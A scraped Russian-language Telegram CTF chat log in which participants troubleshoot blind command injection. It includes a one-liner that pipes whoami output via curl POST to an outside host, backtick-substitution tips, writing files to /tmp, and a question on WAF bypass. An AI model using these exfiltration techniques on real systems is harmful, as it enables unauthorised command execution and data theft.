Size: a a a

2020 July 09

ПП

Проксимов Прксимович... in #ctfchat
точно
источник

ПП

Проксимов Прксимович... in #ctfchat
лел
источник

ML

Milton Library Assis... in #ctfchat
Но он уже поставил в очередь
источник

ПП

Проксимов Прксимович... in #ctfchat
он же чекает еще даже до отправки
источник

ML

Milton Library Assis... in #ctfchat
Да
источник

ПП

Проксимов Прксимович... in #ctfchat
Pryanik
в одинарных пока пустота 🌚ща двойные
в двойных все работает ккста
источник

P

Pryanik in #ctfchat
Проксимов Прксимович
в двойных все работает ккста
У меня нет,но видать ограничения  сплоита(
источник

ПП

Проксимов Прксимович... in #ctfchat
Pryanik
У меня нет,но видать ограничения  сплоита(
Ну по дефолту должно
источник

ПП

Проксимов Прксимович... in #ctfchat
Алсо можешь echo перенаправлять
источник

ПП

Проксимов Прксимович... in #ctfchat
Можешь попробовать `` вместо $()
источник

P

Pryanik in #ctfchat
Проксимов Прксимович
Алсо можешь echo перенаправлять
Кстати и это не работает (
источник

P

Pryanik in #ctfchat
В итоге просто потом на сервере глянул кто файл создал %)
источник

ПП

Проксимов Прксимович... in #ctfchat
какой еще файл?
источник

ПП

Проксимов Прксимович... in #ctfchat
я про пайпы
источник

ПП

Проксимов Прксимович... in #ctfchat
echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать
источник

r

riven in #ctfchat
Проксимов Прксимович
echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать
Можно еще и грепать
источник

r

riven in #ctfchat
Чтоб по красоте было
источник

P

Pryanik in #ctfchat
Проксимов Прксимович
echo -n "$(whoami)" | curl https://host/ -d@-
вот так можно POST послать
curl blabla -o /tmp/file
потом зашел на сервер и написал ll /tmp
кавычки в сплоите нельзя видать( хотя мб два раза экранировать надо просто
источник

m

mido.js in #ctfchat
does anyone know how to bypass WAFs (fingerprinting detection)?
источник

m

mido.js in #ctfchat
Кто-нибудь знает, как обойти WAF (обнаружение отпечатков пальцев)?
источник